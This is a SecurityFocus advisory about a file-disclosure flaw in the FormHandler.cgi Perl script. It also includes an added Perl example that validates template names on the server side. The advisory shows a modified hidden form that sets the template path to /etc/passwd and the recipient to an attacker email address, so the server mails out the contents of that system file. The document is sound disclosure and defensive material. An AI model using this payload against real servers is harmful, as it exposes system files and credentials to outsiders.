FormHandler.cgi Absolute Path Vulnerability

The FormHandler Perl CGI program, available from http://www.cgi-perl.com/programs/FormHandler, lets attackers read any file on the server that the CGI script has read access to.

FormHandler supports templates for the email messages generated by a form submission. These templates are stored as files, and the form document references them by absolute pathname in a hidden field. Because that field is supplied by the client, it is trivial to save a local copy of a form from the target site and edit it as follows:

Original form:
<INPUT TYPE="hidden" NAME="recipient" VALUE="webmaster@victimhost">
<INPUT TYPE="hidden" NAME="subject" VALUE="Form Results">
<INPUT TYPE="hidden" NAME="email_template" VALUE="/usr/web/docs/templates/form.txt">

Edited form:
<INPUT TYPE="hidden" NAME="recipient" VALUE="attacker@attackerhost">
<INPUT TYPE="hidden" NAME="subject" VALUE="Form Results :)">
<INPUT TYPE="hidden" NAME="email_template" VALUE="/etc/passwd">

When the attacker then submits the edited local form, the FormHandler CGI emails the contents of /etc/passwd to the attacker-specified email address.
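
One way a form-mail script can validate the email_template value on the server, shown as an added example and not FormHandler's own code. The resolve_template function and the throwaway template directory are hypothetical, and the approach assumes forms are changed to send a bare template file name instead of an absolute path.

```perl
#!/usr/bin/perl
# Added example: server-side validation of the email_template field.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical path of a template inside $base, or undef when the
# submitted value is not a plain file name that resolves under $base.
# (Hypothetical helper, not part of FormHandler.)
sub resolve_template {
    my ($name, $base) = @_;
    return undef unless defined $name;
    # Bare file name only: rejects "/etc/passwd", "../x", NUL bytes, dotfiles.
    return undef unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    my $real_base = realpath($base);
    return undef unless defined $real_base;
    my $real = realpath(File::Spec->catfile($real_base, $name));
    return undef unless defined $real && -f $real;
    # A symlink placed in the template directory must not lead out of it.
    return undef unless index($real, "$real_base/") == 0;
    return $real;
}

# Constructed demo data: a temporary template directory holding one
# template and one symlink that points outside the directory.
my $dir = tempdir(CLEANUP => 1);
open(my $fh, '>', File::Spec->catfile($dir, 'form.txt')) or die "open: $!";
print {$fh} "constructed template body\n";
close($fh) or die "close: $!";
symlink('/etc/passwd', File::Spec->catfile($dir, 'link.txt'));

# Values as they could arrive in the email_template form field.
for my $value ('form.txt', '/etc/passwd', '../../etc/passwd',
               '/usr/web/docs/templates/form.txt', 'link.txt') {
    my $path = resolve_template($value, $dir);
    printf "%-36s %s\n", $value, defined $path ? 'accepted' : 'rejected';
}
```

Only form.txt is accepted; the absolute paths, the traversal string and the symlink are rejected. The recipient field in the form above is client-supplied in the same way, so it needs the same server-side treatment.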


 

Copyright 2010, SecurityFocus